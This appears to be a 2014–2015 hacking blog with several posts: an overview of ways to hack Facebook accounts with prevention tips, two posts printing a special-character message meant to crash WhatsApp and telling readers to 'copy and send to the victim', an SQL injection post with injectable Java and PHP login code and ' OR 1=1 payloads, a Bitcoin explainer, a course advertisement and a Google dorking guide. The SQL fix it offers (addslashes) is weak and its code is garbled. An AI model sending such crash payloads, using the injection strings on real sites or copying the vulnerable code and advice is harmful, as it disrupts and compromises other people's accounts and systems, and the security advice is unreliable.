Thursday 12 February 2015


Six Ways to hack a Facebook account, something most of our readers always wanted to Learn, something new about Facebook Hacking. Learn the best attacks for Facebook Hacking with their advantages and drawbacks.
Note:- This tutorial is for educational purpose only and may not be used for any blackhat purpose. The prime aim of this tutorial is to create awareness so that you guys can protect yourself from getting hacked.
Before learning the actual procedure you should know about different types of attacks, their drawbacks and prevention against these attacks .


5 Ways to Hack a Facebook Account | Facebook Hacking
1) Phishing :
The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.
DRAWBACK :
Users nowadays are aware of these type of attacks and one can not be easily fooled using this attack. You need some social engineering to trick someone.

Prevention :
Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.
Other way is to use some good Antivirus software which will warn you if you visit a harmful phishing page.
Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.
2) Keylogging :
This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.
DRAWBACK :
Keyloggers are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :
Execute the file only if you trust the sender.
Use online scanner such as novirusthanks.org
Use good antivirus and update it regularly .
3) Trojans/backdoors :
This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .
DRAWBACK :
Trojans are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :
Execute the file only if you trust the sender.
Use online scanner such as novirusthanks.org
Use good antivirus and update it regularly .
4)Sniffing
It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
DRAWBACK :
If user is logged out then attacker is also logged out and the session is lost.
It is difficult to sniff on SSL protected networks.
Prevention :
Always use SSL secured connections.
Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.
5)Social Engineering :
This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
Answering the security questions also lies under this category.
Drawback :
It is not easy to convince someone to make him give his password.
Guessing generally doesn’t always work ( Although if you are lucky enough it may work!).
Prevention :
Never give your password to anyone
Don’t believe in any sort of emails which asks for your password

6) Session Hijacking
In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo.
Drawbacks :
You will be logged out when user is logged out.
You will not get the password of the user’s account.
Will not work if the user is using HTTPS connections.
Prevention :
Always work on SSL secured connections.
Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.

Friday 12 December 2014



A  super cool Vulnerability has been discovered in the wildly popular messaging app WhatsApp, which allows anyone to remotely crash WhatsApp just by sending a specially crafted message.

Two Indian independent security researchers, Indrajeet Bhuyan and Saurav Kar, both 17-year old demonstrated this vulnerability

In a video demonstration, they showed that by sending a 2000 words (2kb) message in special character set can crash the receiver’s app and also the sender's app when he oprn the chat .
This is the code.............
ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ
㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠
ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰
ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊
ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㰟
Ѝ
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊊ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠
ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰
ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ
㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ
㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ㊠ ߘ㠊ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊠ ߘ㊰ߘ㊰ߘ㊠ ߘ
㊠ ߘ㠊

Just copy and send to the victim ,after sending to victim you also can not open the victim's chat.The worried impact of  the  vulnerability is.....................  and still WhatsApp do not patch this .............




Thank you

Thursday 4 December 2014

Yes, it is possible by only a message . The message must be contain at least 2500 special character or more , then the receiver  automatically crashes . This also can effect to the sender.
When in my free time i just made this message and sent to one of my friend.
%%%%##^^○○○○○○○○○○○○@;"';//";:@;;~/-(^;○○○○○○○○○;.;;;;;;'@?:;-&#^^|《》¿£¤ $$_₩₩¥÷÷₩___₩₩₩₩__₩₩₩₩₩₩₩₩ ₩₩₩₩₩₩____₩₩₩₩₩₩₩₩₩₩₩₩ ₩₩₩===₩\\%£££₩]]{{{{<<<{{]₩₩₩₩ ₩____¤$=₩₩[]<<$$<{{{<$¤_₩₩[₩¥¥¥¥₩₩ []]_<__>$$¤_₩_]]]{{{{<$₩₩¥₩[]]]] {_<______ amp="">>}{][₩¥¥₩¥¥¥\\\\₩<<₩₩₩₩₩]]__=¤ ¤¤¤_₩÷÷÷+£¥○○○○]]{{{○○○○○○○○○}>$$$○○○○$€}{]○○○○○○○○[[¥¥¥]{{<<¤$<>}€ €€€$$$<<_>€○○○○€€¤¤=○○○○○○○○○÷÷+£¥₩]]][[\___<<₩¥¥\[[]==++£\]]{{{>>>$_¤==÷]]]{{}>>>$$¤==/;:::?./--^^""::::?./---^^//;;;;::○○○○○○○○○::::::::::"-/;;;;;;○○○○○○○○○:::::" ~~^#&),???::''"^^^^^--^^^#&&&)(.? @@@*'~##^^~""/-^^-(,-###&&) (,.:;~~^^~~;;;/---)--;;::@??/~~~--((-^^^^^---(○○○○////.;;::::'""~~₩₩¥○○○○○○○○○¥₩₩₩¥÷_○○○○○○○○○_¤¤==÷÷++$€€ {{]₩¥¥¥₩¤$¥++££%\]}}><<<<$¤$¤€€¤¤===]] [₩₩¥÷÷££\]{{○○○○○○○○○}}}>>€$=÷¥¥£++÷=₩¤$<€>}{]¥ ¥££¥¥₩__]{<¤=¥₩₩₩<<<}}}>>>>>>_==÷¥¥\[]{{}}>>$$¤=÷÷¥¥¥[]]{{}}<<$¤=÷÷+£¥¥\]{{}}}>>€ €€=÷÷+££\]]{{{}}>>€$$¤=¥¥₩₩[[ [[[[[[~"''~^###&&(()""::;/~~^####&-,.??!!!@@:''"~^##&&(/;:-@《》 《``·《《``·《《《¿¿¡₩¥¥÷○○○○○○○○○¤$$>{○○○○○○○○○]₩¥₩=¤ ¤<[₩¥¥₩₩₩₩₩]]____]¥¥÷₩¥¥÷₩₩¥₩₩ ₩]_¤_[¥¥÷₩₩₩¥¥ > {<<¤$<>}€€€○○○○○○○○€$$$<<_>€€€¤¤=÷÷+£¥₩]]] [[\___<<₩¥¥\[[○○○○○○○○○]==++£\]]{{{>>>$_¤==÷]]] {{○○○○○○○○○}>>>$$¤==/;:::?./--^^""::::?./---○○○○○○○○○○○○○○^^//;;;;::::::::::::"-/;;;;;;:::::"~~^#&),???::''"^^^^^--^^^#&&&)(.?@@ @*'~##^^~""/-^^-(,-###&&)(,.:;~~^^~~;;;/---)--;;::@??/~~~--((-^^^^^---(////.;;::::'""~~₩₩¥¥ ₩₩₩¥÷__¤¤==÷○○○○○○○○○○○○>>>

 When i sent it's 4x greater message to one of my friend ,his whatsapp crashed and hanged up . He also can not delete the particular message for some time and his whatsapp crashed , and my whatsapp also crashed  . The message works according to receiver's phone's operating system , processor and ram . So you can sent the message according to these factor . This does not work on windows phone only works on android versions (do not check in java base mobile)

The most important factor is this message is simply a pattern of special character.....



Thank you

Friday 17 October 2014



          
                
                            Bitcoin
Bitcoin is an experimental, decentralized digital currency that enables instant payments to anyone, anywhere in the world. Bitcoin uses peer-to-peer technology to operate with no central authority: managing transactions and issuing money are carried out collectively by the network.
In many ways, Bitcoin is similar to physical payment networks like Visa credit cards or Paypal. But Bitcoin is different from those and other payment networks in two important ways. It has a peer-to-peer structure, with hundreds of computers all over the Internet working together to process Bitcoin transactions.
People don't need anyone's permission or assistance to create new Bitcoin-based financial services.The second thing that makes the Bitcoin unique is that it comes with its own currency. Paypal and Visa conduct transactions in physical currencies such as the U.S. dollars. The Bitcoin network, however, conducts transactions in a new monetary unit, also called Bitcoin.
Why would we use a payment network based on an imaginary currency?
 Almost everyone who encounters the idea for the first time (including me) has the same reaction: That can't possibly work. But so far the market has proved the skeptics wrong:
This graph shows the price of one Bitcoin since the start of 2011, when the currency began to adopt mainstream attention. The price has been extraordinarily volatile -- it lost more than 90 percent of its value between June and October 2011, for example. But there's also been an unmistakable upward trend. Notice that the chart is on a logarithmic scale. It shows the currency's value rising from around $0.30 at the start of 2011 to around $600 today. There are almost 12 million bitcoins in existence, so the Bitcoin "money supply" is now worth around $7 billion..
 Who created Bitcoin?
The currency was created by a person who indentified himself as "Satoshi Nakamoto." While the name sounds Japanese, Bitcoin's creator never provided any personal details. Nakamoto passed his torch to a mild-mannered developer named Gavin Andressen, who is currently the project's lead developer. Andressen now works under the auspices of the Bitcoin Foundation, the closest thing the anarchic Bitcoin community has to an official public face.
 How do we get bitcoins?
One option is to mine them yourself, but that's not a good choice for beginners. For everyone else, your best bet is to purchase them with a physical currency. Web sites known as exchanges will let you trade bitcoins for physical currencies with other users. Even more convenient are companies like Coinbase, which will withdraw cash from your bank account and convert it to bitcoins at the current exchange rate. A few  are popping up, which will directly trade paper money for Bitcoins.
Wallet 


After you bought some bitcoins , Next you'll need a place to store them. Bitcoins are stored in "wallets," which in this case are just files that contain encryption keys, or secret codes that allow you to transfer your bitcoins to other people. There are several options. One is to store them yourself using one of the Bitcoin programs available for Mac, PC and Android.
Another option is to entrust them to a third-party Web site known as a "online wallet."
A third option is what's known as a "paper wallet," where you print out your encryption keys and store them in a safe place, such as a safe deposit box.
Why Use Bitcoin?
 
Low Fees

Bitcoin is a digital currency that is designed for global commerce in the modern age, with the ease of a credit card but without the high fees.
Global

Bitcoin can be used at the same value anywhere in the world where Bitcoins are authorized, thus becoming the first truly global currency.

Protected

 

The nature of Bitcoin means that, compared to credit cards or other financial tools, your identity is safer from theft. Your level of privacy is up to you, and in the online world privacy and protection are an asset.

How Bitcoin Works
  
Digitally Created

Financial systems take a lot of power to run. With Bitcoin, individuals and groups willing to dedicate computer processing power to support the network are rewarded with Bitcoins. This process is known as mining, and it's how every Bitcoin comes into existence.

Secure

All newly mined Bitcoins, along with every transaction, are publicly recorded and verified through the network. This record is known as the Blockchain and is one of the features that helps keep the system secure from fraud and abuse. Bitcoins cannot be duplicated or forged.  

Getting Started With Bitcoin

Storage

There are several ways to store and manage your Bitcoins. An online web wallet is an easy way to get started with storing Bitcoin, and more and more wallets are offering the ability to buy Bitcoin in your local currency.

Trade Locally

You can acquire Bitcoins by buying or trading for them from local vendors, or accepting them for your business instead of cash or credit.

Exchange Globally

To use Bitcoin at a more advanced level, an exchange connects you to people all around the world buying and selling Bitcoins. Exchanges offer both a web wallet for storage and management, and an easy way to trade using major currencies.










By Ankush Mohanty

Friday 10 October 2014

 
 Hack an Website ? SQL Injection ? Very simple by Konduru Jashwanth
 
Are you looking for some useful tips to improve your web projects security? In this post I suggest you some interesting points about this topic.
Hacking is very interesting topic you can improve programming skill.
SQL Injection
SQL Injection like this
 
 
Login Java Code

String userid = request.getParameter(“userid”);
String password = request.getParameter(“password”);
Class.forName(“sun.jdbc.odbc.JdbcOdbcDriver”);
connection = DriverManager.getConnection(“jdbc:odbc:projectDB”);query = “SELECT * FROM Users WHERE user_id =’” + userid + “‘ AND password =’” + password +”‘”;
PreparedStatement ps = connection.prepareStatement(query);
ResultSet users = ps.executeQuery();
if(users.next()){
//some thing here
}
else{
}

Injection Works like this

query = “SELECT * FROM Users WHERE user_id =” OR 1=1; /* AND password =’*/–’”;
Login PHP Code;
Username = ‘ OR 1=1;//
Password = ….
$myusername=$_POST['usr'];
$mypassword=$_POST['pwd'];$sql=”SELECT * FROM users WHERE user=’$myusername’ and password=’$mypassword’”;
$result=mysql_query($sql);
$count=mysql_num_rows($result);
if($count==1){
//some code
}
else {
}

Injection Works like this

$sql=”SELECT * FROM users WHERE user=”OR 1 = 1;//’ and password=’….’”;
How to avoid these mistakes Use addSlashes() function adding slashes(/) to the string in java and php
//Java Code
addSlashes(String userid);// PHP Code
$myusername=addslashes($_POST['usr'];);
Hacker is intelligent than programmer. So always hide the file extension (eg: *.jsp,*.php,*.asp).
http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java redirect this URL links using Web.xml file and inn php write .htaccess file in root directory


any queries Comment or ping me

Email: kondurujashwanth@instructor.net

Thursday 9 October 2014

Get certified by Cyber Security & Privacy Foundation as a WhiteHat Hacker .


The course contain both web security testing and network security testing .The course teaches you how to use the security tools to find vulnerabilities in websites and programmers will learn to write secure source code by knowing the vulnerabilities. The course price only 10$ , which is affordable for this level of certification 

The course contains :

Section 1 - Introduction
Section 2 - Web Penetration Tools
Section 3 - Adv. Tools for V.A.P.T
Section 4 - Port scan
Section 5 - Nessus ( vulnerability scanner)
Section 6 - Metasploit (the exploiting tool used for penetration testing)
Section 7 - Ophcrack (cracking windows hashes)
Section 8 - Automated SQL injection
Section 9 - Advanced Persistent Threat
Section 10 - Quiz

For more details go HERE
OR go to this link directly https://www.udemy.com/certified-white-hat-hacker-level-1-advanced


 


JOIN  AND ENJOY  


Please give feedback


Tuesday 18 February 2014



                                                                Google Hacking

Google is the most popular search engine on the planet, so much so that its name has become a verb. (As in, “to google.”) The term “google” was originally “googol,” a term meaning the number “1” followed by 100 zeroes, created by prominent mathematician Edward Kasner
Google search is a web search engine owned by Google Inc. and is the most-used search engine on the Web.
A California-based public corporation specializing in online searches and advertising. Google was created by Stanford students Larry Page and Sergey Brin and has by now become the world's leading search engine in terms of reach.



Advance Search Operators
•There are many more advanced operators.
•Combining these creatively is the key to Google Hacking.
allinanchor: All query words must appear in anchor text of links to the page.
 inanchor: Terms must appear in anchor text of links to the page.
allintext: All query words must appear in the text of the page.
intext: The terms must appear in the text of the page.
allintitle: All query words must appear in the title of the page. 
 intitle: The terms must appear in the title of the page.
 allinurl: All query words must appear in the URL.
inurl:     The terms must appear in the URL of the page.

Advance Search Operators(Contd.)
•Advanced Search Operators
     site: (.edu, .gov, foundstone.com, usc.edu)
     filetype: (txt, xls, mdb, pdf, .log)
     Daterange: (julian date format)
     Intitle / allintitle
     Inurl / allinurl
Some other things to keep in mind:
   Google queries are not case sensitive.
   The * wildcard represents any word
      Example: “* insurance quote”
   Google stems words automatically
      Example: “automobile insurance quote” brings up sites       with “auto…”


Countermeasures

•Keep sensitive data off the web!!
•Perform periodic Google Assessments
– Update robots.txt
– Use meta-tags: NO ARCHIVE

How To Protect Your Websites From Google Hackers.
•In general, be very careful about what content you place on your Internet-facing websites.
•Do not display detailed error messages.
•Do not allow directory browsing.
●Keep all of your links environment specific.
●Keep your name and email out of HTML comments and don’t post them on Google Groups.
●Configure your web server to only serve up a list of “safe” file types and to respond with “File Not   Found” for any unsafe types.
●Use a robots.txt file to prevent Google and other search engines from crawling your site if it shouldn’t be crawled.


But we can use these for well use like eBook search ,video ,and many more useful works



                                                                                                              Ankush Mohanty




    Ankush Mohanty: is a Security Researcher and Analyst, with experience in various aspects of Information Security. Other then this he is a Certified Ethical Hacker. His all efforts are to make internet more Secure.


    MyFreeCopyright.com Registered & Protected
    MyFreeCopyright.com Registered & Protected